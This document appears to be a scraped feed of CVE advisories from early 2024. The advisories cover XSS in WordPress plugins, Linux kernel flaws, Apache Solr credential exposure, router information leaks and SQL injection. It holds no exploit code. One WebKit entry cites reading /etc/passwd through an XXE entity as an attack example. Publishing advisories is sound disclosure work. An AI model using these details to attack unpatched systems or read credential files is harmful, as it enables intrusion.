🚨 CVE-2023-50875Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Automattic Sensei LMS – Online Courses, Quizzes, & Learning allows Stored XSS.This issue affects Sensei LMS – Online Courses, Quizzes, & Learning: from n/a through 4.17.0.🎖@cveNotify |
|
| 2024-02-12 07:37:24 |
🚨 CVE-2023-47526Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chart Builder Team Chartify – WordPress Chart Plugin allows Stored XSS.This issue affects Chartify – WordPress Chart Plugin: from n/a through 2.0.6.🎖@cveNotify |
|
| 2024-02-12 06:37:32 |
🚨 CVE-2024-24933Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Prasidhda Malla Honeypot for WP Comment allows Reflected XSS.This issue affects Honeypot for WP Comment: from n/a through 2.2.3.🎖@cveNotify |
|
| 2024-02-12 06:37:25 |
🚨 CVE-2024-24930Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in OTWthemes.Com Buttons Shortcode and Widget allows Stored XSS.This issue affects Buttons Shortcode and Widget: from n/a through 1.16.🎖@cveNotify |
|
| 2024-02-12 06:37:24 |
🚨 CVE-2024-24927Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in UnitedThemes Brooklyn | Creative Multi-Purpose Responsive WordPress Theme allows Reflected XSS.This issue affects Brooklyn | Creative Multi-Purpose Responsive WordPress Theme: from n/a through 4.9.7.6.🎖@cveNotify |
|
| 2024-02-12 05:37:24 |
🚨 CVE-2024-25744In the Linux kernel before 6.6.7, an untrusted VMM can trigger int80 syscall handling at any given point. This is related to arch/x86/coco/tdx/tdx.c and arch/x86/mm/mem_encrypt_amd.c.🎖@cveNotify |
|
| 2024-02-12 04:37:24 |
🚨 CVE-2023-22467Luxon is a library for working with dates and times in JavaScript. On the 1.x branch prior to 1.38.1, the 2.x branch prior to 2.5.2, and the 3.x branch on 3.2.1, Luxon's `DateTime.fromRFC2822() has quadratic (N^2) complexity on some specific inputs. This causes a noticeable slowdown for inputs with lengths above 10k characters. Users providing untrusted data to this method are therefore vulnerable to (Re)DoS attacks. This issue also appears in Moment as CVE-2022-31129. Versions 1.38.1, 2.5.2, and 3.2.1 contain patches for this issue. As a workaround, limit the length of the input.🎖@cveNotify |
|
| 2024-02-12 03:37:32 |
🚨 CVE-2024-25739create_empty_lvol in drivers/mtd/ubi/vtbl.c in the Linux kernel through 6.7.4 can attempt to allocate zero bytes, and crash, because of a missing check for ubi->leb_size.🎖@cveNotify |
|
| 2024-02-12 03:37:26 |
🚨 CVE-2023-52429dm_table_create in drivers/md/dm-table.c in the Linux kernel through 6.7.4 can attempt to (in alloc_targets) allocate more than INT_MAX bytes, and crash, because of a missing check for struct dm_ioctl.target_count.🎖@cveNotify |
|
| 2024-02-12 03:37:25 |
🚨 CVE-2023-28531ssh-add in OpenSSH before 9.3 adds smartcard keys to ssh-agent without the intended per-hop destination constraints. The earliest affected version is 8.9.🎖@cveNotify |
|
| 2024-02-12 03:37:24 |
🚨 CVE-2023-22467Luxon is a library for working with dates and times in JavaScript. On the 1.x branch prior to 1.38.1, the 2.x branch prior to 2.5.2, and the 3.x branch on 3.2.1, Luxon's `DateTime.fromRFC2822() has quadratic (N^2) complexity on some specific inputs. This causes a noticeable slowdown for inputs with lengths above 10k characters. Users providing untrusted data to this method are therefore vulnerable to (Re)DoS attacks. This issue also appears in Moment as CVE-2022-31129. Versions 1.38.1, 2.5.2, and 3.2.1 contain patches for this issue. As a workaround, limit the length of the input.🎖@cveNotify |
|
| 2024-02-11 23:37:24 |
🚨 CVE-2024-1433A vulnerability, which was classified as problematic, was found in KDE Plasma Workspace up to 5.93.0. This affects the function EventPluginsManager::enabledPlugins of the file components/calendar/eventpluginsmanager.cpp of the component Theme File Handler. The manipulation of the argument pluginId leads to path traversal. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The patch is named 6cdf42916369ebf4ad5bd876c4dfa0170d7b2f01. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-253407. NOTE: This requires write access to user's home or the installation of third party global themes.🎖@cveNotify |
|
| 2024-02-11 22:37:32 |
🚨 CVE-2024-1245Concrete CMS version 9 before 9.2.5 is vulnerable to stored XSS in file tags and description attributes since administrator entered file attributes are not sufficiently sanitized in the Edit Attributes page. A rogue administrator could put malicious code into the file tags or description attributes and, when another administrator opens the same file for editing, the malicious code could execute. The Concrete CMS Security team scored this 2.4 with CVSS v3 vector AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N.🎖@cveNotify |
|
| 2024-02-11 22:37:26 |
🚨 CVE-2024-1247Concrete CMS version 9 before 9.2.5 is vulnerable to stored XSS via the Role Name field since there is insufficient validation of administrator provided data for that field. A rogue administrator could inject malicious code into the Role Name field which might be executed when users visit the affected page. The Concrete CMS Security team scored this 2 with CVSS v3 vector AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator . Concrete versions below 9 do not include group types so they are not affected by this vulnerability.🎖@cveNotify |
|
| 2024-02-11 22:37:25 |
🚨 CVE-2023-50292Incorrect Permission Assignment for Critical Resource, Improper Control of Dynamically-Managed Code Resources vulnerability in Apache Solr.This issue affects Apache Solr: from 8.10.0 through 8.11.2, from 9.0.0 before 9.3.0.The Schema Designer was introduced to allow users to more easily configure and test new Schemas and configSets.However, when the feature was created, the "trust" (authentication) of these configSets was not considered.External library loading is only available to configSets that are "trusted" (created by authenticated users), thus non-authenticated users are unable to perform Remote Code Execution.Since the Schema Designer loaded configSets without taking their "trust" into account, configSets that were created by unauthenticated users were allowed to load external libraries when used in the Schema Designer.Users are recommended to upgrade to version 9.3.0, which fixes the issue.🎖@cveNotify |
|
| 2024-02-11 22:37:24 |
🚨 CVE-2023-50291Insufficiently Protected Credentials vulnerability in Apache Solr.This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.3.0.One of the two endpoints that publishes the Solr process' Java system properties, /admin/info/properties, was only setup to hide system properties that had "password" contained in the name.There are a number of sensitive system properties, such as "basicauth" and "aws.secretKey" do not contain "password", thus their values were published via the "/admin/info/properties" endpoint.This endpoint populates the list of System Properties on the home screen of the Solr Admin page, making the exposed credentials visible in the UI.This /admin/info/properties endpoint is protected under the "config-read" permission.Therefore, Solr Clouds with Authorization enabled will only be vulnerable through logged-in users that have the "config-read" permission.Users are recommended to upgrade to version 9.3.0 or 8.11.3, which fixes the issue.A single option now controls hiding Java system property for all endpoints, "-Dsolr.hiddenSysProps".By default all known sensitive properties are hidden (including "-Dbasicauth"), as well as any property with a name containing "secret" or "password".Users who cannot upgrade can also use the following Java system property to fix the issue: '-Dsolr.redaction.system.pattern=.*(password|secret|basicauth).*'🎖@cveNotify |
|
| 2024-02-11 21:37:25 |
🚨 CVE-2024-25418flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /core/tools/delete_menu.php.🎖@cveNotify |
|
| 2024-02-11 21:37:24 |
🚨 CVE-2024-24806libuv is a multi-platform support library with a focus on asynchronous I/O. The `uv_getaddrinfo` function in `src/unix/getaddrinfo.c` (and its windows counterpart `src/win/getaddrinfo.c`), truncates hostnames to 256 characters before calling `getaddrinfo`. This behavior can be exploited to create addresses like `0x00007f000001`, which are considered valid by `getaddrinfo` and could allow an attacker to craft payloads that resolve to unintended IP addresses, bypassing developer checks. The vulnerability arises due to how the `hostname_ascii` variable (with a length of 256 bytes) is handled in `uv_getaddrinfo` and subsequently in `uv__idna_toascii`. When the hostname exceeds 256 characters, it gets truncated without a terminating null byte. As a result attackers may be able to access internal APIs or for websites (similar to MySpace) that allows users to have `username.example.com` pages. Internal services that crawl or cache these user pages can be exposed to SSRF attacks if a malicious user chooses a long vulnerable username. This issue has been addressed in release version 1.48.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-02-11 15:37:24 |
🚨 CVE-2024-1151A vulnerability was reported in the Open vSwitch sub-component in the Linux Kernel. The flaw occurs when a recursive operation of code push recursively calls into the code block. The OVS module does not validate the stack depth, pushing too many frames and causing a stack overflow. As a result, this can lead to a crash or other related issues.🎖@cveNotify |
|
| 2024-02-11 09:37:24 |
🚨 CVE-2024-21875Allocation of Resources Without Limits or Throttling vulnerability in Badge leading to a denial of service attack.Team Hacker Hotel Badge 2024 on risc-v (billboard modules) allows Flooding.This issue affects Hacker Hotel Badge 2024: from 0.1.0 through 0.1.3.🎖@cveNotify |
|
| 2024-02-11 07:37:24 |
🚨 CVE-2024-23206An access issue was addressed with improved access restrictions. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A maliciously crafted webpage may be able to fingerprint the user.🎖@cveNotify |
|
| 2024-02-11 06:37:30 |
🚨 CVE-2024-23222A type confusion issue was addressed with improved checks. This issue is fixed in tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-02-11 06:37:26 |
🚨 CVE-2023-6174SSH dissector crash in Wireshark 4.0.0 to 4.0.10 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2024-02-11 06:37:25 |
🚨 CVE-2023-3750A flaw was found in libvirt. The virStoragePoolObjListSearch function does not return a locked pool as expected, resulting in a race condition and denial of service when attempting to lock the same object from another thread. This issue could allow clients connecting to the read-only socket to crash the libvirt daemon.🎖@cveNotify |
|
| 2024-02-11 06:37:24 |
🚨 CVE-2023-2700A vulnerability was found in libvirt. This security flaw ouccers due to repeatedly querying an SR-IOV PCI device's capabilities that exposes a memory leak caused by a failure to free the virPCIVirtualFunction array within the parent struct's g_autoptr cleanup.🎖@cveNotify |
|
| 2024-02-11 05:37:25 |
🚨 CVE-2024-25718In the Samly package before 1.4.0 for Elixir, Samly.State.Store.get_assertion/3 can return an expired session, which interferes with access control because Samly.AuthHandler uses a cached session and does not replace it, even after expiry.🎖@cveNotify |
|
| 2024-02-11 05:37:24 |
🚨 CVE-2023-52428In Connect2id Nimbus JOSE+JWT before 9.37.2, an attacker can cause a denial of service (resource consumption) via a large JWE p2c header value (aka iteration count) for the PasswordBasedDecrypter (PBKDF2) component.🎖@cveNotify |
|
| 2024-02-11 04:37:24 |
🚨 CVE-2023-52427In OpenDDS through 3.27, there is a segmentation fault for a DataWriter with a large value of resource_limits.max_samples. NOTE: the vendor's position is that the product is not designed to handle a max_samples value that is too large for the amount of memory on the system.🎖@cveNotify |
|
| 2024-02-11 03:37:25 |
🚨 CVE-2024-1432** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in DeepFaceLab pretrained DF.wf.288res.384.92.72.22 and classified as problematic. This issue affects the function apply_xseg of the file main.py. The manipulation leads to deserialization. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-253391. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-02-11 03:37:24 |
🚨 CVE-2024-1431A vulnerability was found in Netgear R7000 1.0.11.136_10.2.120 and classified as problematic. Affected by this issue is some unknown functionality of the file /debuginfo.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. VDB-253382 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-11 01:37:24 |
🚨 CVE-2024-1430A vulnerability has been found in Netgear R7000 1.0.11.136_10.2.120 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /currentsetting.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier VDB-253381 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-11 00:37:24 |
🚨 CVE-2024-22859Cross-Site Request Forgery (CSRF) vulnerability in livewire before v3.0.4, allows remote attackers to execute arbitrary code getCsrfToken function. NOTE: the vendor disputes this because the 5d88731 commit fixes a usability problem (HTTP 419 status codes for legitimate client activity), not a security problem.🎖@cveNotify |
|
| 2024-02-10 16:37:25 |
🚨 CVE-2024-22312IBM Storage Defender - Resiliency Service 2.0 stores user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 278748.🎖@cveNotify |
|
| 2024-02-10 16:37:24 |
🚨 CVE-2023-50957IBM Storage Defender - Resiliency Service 2.0 could allow a privileged user to perform unauthorized actions after obtaining encrypted data from clear text key storage. IBM X-Force ID: 275783.🎖@cveNotify |
|
| 2024-02-10 15:37:24 |
🚨 CVE-2024-22361IBM Semeru Runtime 8.0.302.0 through 8.0.392.0, 11.0.12.0 through 11.0.21.0, 17.0.1.0 - 17.0.9.0, and 21.0.1.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 281222.🎖@cveNotify |
|
| 2024-02-10 11:37:24 |
🚨 CVE-2023-6656** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in DeepFaceLab pretrained DF.wf.288res.384.92.72.22. It has been rated as critical. Affected by this issue is some unknown functionality of the file DFLIMG/DFLJPG.py. The manipulation leads to deserialization. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of this vulnerability is VDB-247364. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-02-10 09:37:31 |
🚨 CVE-2024-23516Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Calculators World CC BMI Calculator allows Stored XSS.This issue affects CC BMI Calculator: from n/a through 2.0.1.🎖@cveNotify |
|
| 2024-02-10 09:37:30 |
🚨 CVE-2023-51493Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Howard Ehrenberg Custom Post Carousels with Owl allows Stored XSS.This issue affects Custom Post Carousels with Owl: from n/a through 1.4.6.🎖@cveNotify |
|
| 2024-02-10 09:37:29 |
🚨 CVE-2023-51492Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in If So Plugin If-So Dynamic Content Personalization allows Stored XSS.This issue affects If-So Dynamic Content Personalization: from n/a through 1.6.3.1.🎖@cveNotify |
|
| 2024-02-10 09:37:26 |
🚨 CVE-2023-51488Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Automattic, Inc. Crowdsignal Dashboard – Polls, Surveys & more allows Reflected XSS.This issue affects Crowdsignal Dashboard – Polls, Surveys & more: from n/a through 3.0.11.🎖@cveNotify |
|
| 2024-02-10 09:37:25 |
🚨 CVE-2023-51415Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GiveWP GiveWP – Donation Plugin and Fundraising Platform allows Stored XSS.This issue affects GiveWP – Donation Plugin and Fundraising Platform: from n/a through 3.2.2.🎖@cveNotify |
|
| 2024-02-10 09:37:24 |
🚨 CVE-2023-51404Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MyAgilePrivacy My Agile Privacy – The only GDPR solution for WordPress that you can truly trust allows Stored XSS.This issue affects My Agile Privacy – The only GDPR solution for WordPress that you can truly trust: from n/a through 2.1.7.🎖@cveNotify |
|
| 2024-02-10 08:37:32 |
🚨 CVE-2024-24803Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPoperation Ultra Companion – Companion plugin for WPoperation Themes allows Stored XSS.This issue affects Ultra Companion – Companion plugin for WPoperation Themes: from n/a through 1.1.9.🎖@cveNotify |
|
| 2024-02-10 08:37:26 |
🚨 CVE-2024-24801Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LogicHunt OWL Carousel – WordPress Owl Carousel Slider allows Stored XSS.This issue affects OWL Carousel – WordPress Owl Carousel Slider: from n/a through 1.4.0.🎖@cveNotify |
|
| 2024-02-10 08:37:25 |
🚨 CVE-2024-24712Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Team Heateor Heateor Social Login WordPress allows Stored XSS.This issue affects Heateor Social Login WordPress: from n/a through 1.1.30.🎖@cveNotify |
|
| 2024-02-10 08:37:24 |
🚨 CVE-2024-1406A vulnerability was found in Linksys WRT54GL 4.30.18. It has been declared as problematic. This vulnerability affects unknown code of the file /SysInfo1.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. VDB-253330 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-10 07:37:25 |
🚨 CVE-2024-0595The Awesome Support – WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wpas_get_users() function hooked via AJAX in all versions up to, and including, 6.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve user data such as emails.🎖@cveNotify |
|
| 2024-02-10 07:37:24 |
🚨 CVE-2024-0594The Awesome Support – WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to union-based SQL Injection via the 'q' parameter of the wpas_get_users action in all versions up to, and including, 6.1.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-02-10 06:37:24 |
🚨 CVE-2024-1405A vulnerability was found in Linksys WRT54GL 4.30.18. It has been classified as problematic. This affects an unknown part of the file /wlaninfo.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier VDB-253329 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-10 05:37:24 |
🚨 CVE-2024-21490This affects versions of the package angular from 1.3.0. A regular expression used to split the value of the ng-srcset directive is vulnerable to super-linear runtime due to backtracking. With a large carefully-crafted input, this can result in catastrophic backtracking and cause a denial of service. **Note:**This package is EOL and will not receive any updates to address this issue. Users should migrate to [@angular/core](https://www.npmjs.com/package/@angular/core).🎖@cveNotify |
|
| 2024-02-10 04:37:32 |
🚨 CVE-2024-23978Heap-based buffer overflow vulnerability exists in HOME SPOT CUBE2 V102 and earlier. By processing invalid values, arbitrary code may be executed. Note that the affected products are no longer supported.🎖@cveNotify |
|
| 2024-02-10 04:37:26 |
🚨 CVE-2024-21780Stack-based buffer overflow vulnerability exists in HOME SPOT CUBE2 V102 and earlier. Processing a specially crafted command may result in a denial of service (DoS) condition. Note that the affected products are no longer supported.🎖@cveNotify |
|
| 2024-02-10 04:37:25 |
🚨 CVE-2024-23746Miro Desktop 0.8.18 on macOS allows Electron code injection.🎖@cveNotify |
|
| 2024-02-10 04:37:24 |
🚨 CVE-2024-22779Directory Traversal vulnerability in Kihron ServerRPExposer v.1.0.2 and before allows a remote attacker to execute arbitrary code via the loadServerPack in ServerResourcePackProviderMixin.java.🎖@cveNotify |
|
| 2024-02-10 04:07:26 |
🚨 CVE-2024-23824mailcow is a dockerized email package, with multiple containers linked in one bridged network. The application is vulnerable to pixel flood attack, once the payload has been successfully uploaded in the logo the application goes slow and doesn't respond in the admin page. It is tested on the versions 2023-12a and prior and patched in version 2024-01.🎖@cveNotify |
|
| 2024-02-10 04:07:25 |
🚨 CVE-2020-24681Incorrect Permission Assignment for Critical Resource vulnerability in B&R Industrial Automation Automation Studio allows Privilege Escalation.This issue affects Automation Studio: from 4.6.0 through 4.6.X, from 4.7.0 before 4.7.7 SP, from 4.8.0 before 4.8.6 SP, from 4.9.0 before 4.9.4 SP.🎖@cveNotify |
|
| 2024-02-10 04:07:24 |
🚨 CVE-2023-46045Graphviz 2.36 before 10.0.0 has an out-of-bounds read via a crafted config6a file. NOTE: exploitability may be uncommon because this file is typically owned by root.🎖@cveNotify |
|
| 2024-02-10 03:37:25 |
🚨 CVE-2023-45696Sametime is impacted by sensitive fields with autocomplete enabled in the Legacy web chat client. By default, this allows user entered data to be stored by the browser.🎖@cveNotify |
|
| 2024-02-10 03:37:24 |
🚨 CVE-2007-4961The login_to_simulator method in Linden Lab Second Life, as used by the secondlife:// protocol handler and possibly other Second Life login mechanisms, sends an MD5 hash in cleartext in the passwd field, which allows remote attackers to login to an account by sniffing the network and then sending this hash to a Second Life authentication server.🎖@cveNotify |
|
| 2024-02-10 03:07:32 |
🚨 CVE-2009-2367cgi-bin/makecgi-pro in Iomega StorCenter Pro generates predictable session IDs, which allows remote attackers to hijack active sessions and gain privileges via brute force guessing attacks on the session_id parameter.🎖@cveNotify |
|
| 2024-02-10 03:07:26 |
🚨 CVE-2009-1699The XSL stylesheet implementation in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not properly handle XML external entities, which allows remote attackers to read arbitrary files via a crafted DTD, as demonstrated by a file:///etc/passwd URL in an entity declaration, related to an "XXE attack."🎖@cveNotify |
|
| 2024-02-10 03:07:25 |
🚨 CVE-2002-1800phpRank 1.8 stores the administrative password in plaintext on the server and in the "ap" cookie, which allows remote attackers to retrieve the administrative password.🎖@cveNotify |
|
| 2024-02-10 03:07:24 |
🚨 CVE-2001-1536Autogalaxy stores usernames and passwords in cleartext in cookies, which makes it easier for remote attackers to obtain authentication information and gain unauthorized access via sniffing or a cross-site scripting attack.🎖@cveNotify |
|
| 2024-02-10 02:37:32 |
🚨 CVE-2024-0372The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_form_fields' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views.🎖@cveNotify |
|
| 2024-02-10 02:37:26 |
🚨 CVE-2024-0371The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'create_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views.🎖@cveNotify |
|
| 2024-02-10 02:37:25 |
🚨 CVE-2023-6174SSH dissector crash in Wireshark 4.0.0 to 4.0.10 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2024-02-10 02:37:24 |
🚨 CVE-2023-5371RTPS dissector memory leak in Wireshark 4.0.0 to 4.0.8 and 3.6.0 to 3.6.16 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2024-02-10 02:07:25 |
🚨 CVE-2024-23831LedgerSMB is a free web-based double-entry accounting system. When a LedgerSMB database administrator has an active session in /setup.pl, an attacker can trick the admin into clicking on a link which automatically submits a request to setup.pl without the admin's consent. This request can be used to create a new user account with full application (/login.pl) privileges, leading to privilege escalation. The vulnerability is patched in versions 1.10.30 and 1.11.9.🎖@cveNotify |
|
| 2024-02-10 02:07:24 |
🚨 CVE-2020-24682Unquoted Search Path or Element vulnerability in B&R Industrial Automation Automation Studio, B&R Industrial Automation NET/PVI allows Target Programs with Elevated Privileges.This issue affects Automation Studio: from 4.0 through 4.6, from 4.7.0 before 4.7.7 SP, from 4.8.0 before 4.8.6 SP, from 4.9.0 before 4.9.4 SP; NET/PVI: from 4.0 through 4.6, from 4.7.0 before 4.7.7, from 4.8.0 before 4.8.6, from 4.9.0 before 4.9.4.🎖@cveNotify |
|
| 2024-02-10 01:37:32 |
🚨 CVE-2024-1190A vulnerability was found in Global Scape CuteFTP 9.3.0.3 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation of the argument Host/Username/Password leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252680. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-10 01:37:25 |
🚨 CVE-2024-1187A vulnerability, which was classified as problematic, has been found in Munsoft Easy Outlook Express Recovery 2.0. This issue affects some unknown processing of the component Registration Key Handler. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-252677 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-10 01:37:24 |
🚨 CVE-2024-1186A vulnerability classified as problematic was found in Munsoft Easy Archive Recovery 2.0. This vulnerability affects unknown code of the component Registration Key Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252676. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-10 01:07:32 |
🚨 CVE-2024-23553A cross-site scripting (XSS) vulnerability in the Web Reports component of HCL BigFix Platform exists due to missing a specific http header attribute.🎖@cveNotify |
|
| 2024-02-10 01:07:25 |
🚨 CVE-2022-40744IBM Aspera Faspex 5.0.6 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 236441.🎖@cveNotify |
|
| 2024-02-10 01:07:24 |
🚨 CVE-2023-46159IBM Storage Ceph 5.3z1, 5.3z5, and 6.1z1 could allow an authenticated user on the network to cause a denial of service from RGW. IBM X-Force ID: 268906.🎖@cveNotify |
|
| 2024-02-10 00:37:24 |
🚨 CVE-2024-21591An Out-of-bounds Write vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS), or Remote Code Execution (RCE) and obtain root privileges on the device.This issue is caused by use of an insecure function allowing an attacker to overwrite arbitrary memory.This issue affects Juniper Networks Junos OS SRX Series and EX Series: * Junos OS versions earlier than 20.4R3-S9; * Junos OS 21.2 versions earlier than 21.2R3-S7; * Junos OS 21.3 versions earlier than 21.3R3-S5; * Junos OS 21.4 versions earlier than 21.4R3-S5; * Junos OS 22.1 versions earlier than 22.1R3-S4; * Junos OS 22.2 versions earlier than 22.2R3-S3; * Junos OS 22.3 versions earlier than 22.3R3-S2; * Junos OS 22.4 versions earlier than 22.4R2-S2, 22.4R3.🎖@cveNotify |
|
| 2024-02-09 23:37:32 |
🚨 CVE-2024-23324Envoy is a high-performance edge/middle/service proxy. External authentication can be bypassed by downstream connections. Downstream clients can force invalid gRPC requests to be sent to ext_authz, circumventing ext_authz checks when failure_mode_allow is set to true. This issue has been addressed in released 1.29.1, 1.28.1, 1.27.3, and 1.26.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-02-09 23:37:25 |
🚨 CVE-2024-1404A vulnerability was found in Linksys WRT54GL 4.30.18 and classified as problematic. Affected by this issue is some unknown functionality of the file /SysInfo.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253328. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-09 23:37:24 |
🚨 CVE-2023-6935wolfSSL SP Math All RSA implementation is vulnerable to the Marvin Attack, new variation of a timing Bleichenbacher style attack, when built with the following options to configure:--enable-all CFLAGS="-DWOLFSSL_STATIC_RSA"The define “WOLFSSL_STATIC_RSA” enables static RSA cipher suites, which is not recommended, and has been disabled by default since wolfSSL 3.6.6. Therefore the default build since 3.6.6, even with "--enable-all", is not vulnerable to the Marvin Attack. The vulnerability is specific to static RSA cipher suites, and expected to be padding-independent.The vulnerability allows an attacker to decrypt ciphertexts and forge signatures after probing with a large number of test observations. However the server’s private key is not exposed.🎖@cveNotify |
|
| 2024-02-09 22:37:25 |
🚨 CVE-2024-1246Concrete CMS in version 9 before 9.2.5 is vulnerable to reflected XSS via the Image URL Import Feature due to insufficient validation of administrator provided data. A rogue administrator could inject malicious code when importing images, leading to the execution of the malicious code on the website user’s browser. The Concrete CMS Security team scored this 2 with CVSS v3 vector AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N. This does not affect Concrete versions prior to version 9.🎖@cveNotify |
|
| 2024-02-09 22:37:24 |
🚨 CVE-2024-1245Concrete CMS version 9 before 9.2.5 is vulnerable to stored XSS in file tags and description attributes since administrator entered file attributes are not sufficiently sanitized in the Edit Attributes page. A rogue administrator could put malicious code into the file tags or description attributes and, when another administrator opens the same file for editing, the malicious code could execute. The Concrete CMS Security team scored this 2.4 with CVSS v3 vector AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N.🎖@cveNotify |
|
| 2024-02-09 21:37:24 |
🚨 CVE-2023-50349Sametime is impacted by a Cross Site Request Forgery (CSRF) vulnerability. Some REST APIs in the Sametime Proxy application can allow an attacker to perform malicious actions on the application.🎖@cveNotify |
|
| 2024-02-09 20:37:32 |
🚨 CVE-2023-6078An OS Command Injection vulnerability exists in BIOVIA Materials Studio products from Release BIOVIA 2021 through Release BIOVIA 2023. Upload of a specially crafted perl script can lead to arbitrary command execution.🎖@cveNotify |
|
| 2024-02-09 20:37:25 |
🚨 CVE-2024-1113A vulnerability, which was classified as critical, was found in openBI up to 1.0.8. This affects the function uploadUnity of the file /application/index/controller/Unity.php. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252471.🎖@cveNotify |
|
| 2024-02-09 20:37:24 |
🚨 CVE-2008-4078SQL injection vulnerability in the AR/AP transaction report in (1) LedgerSMB (LSMB) before 1.2.15 and (2) SQL-Ledger 2.8.17 and earlier allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors.🎖@cveNotify |
|
| 2024-02-09 20:07:32 |
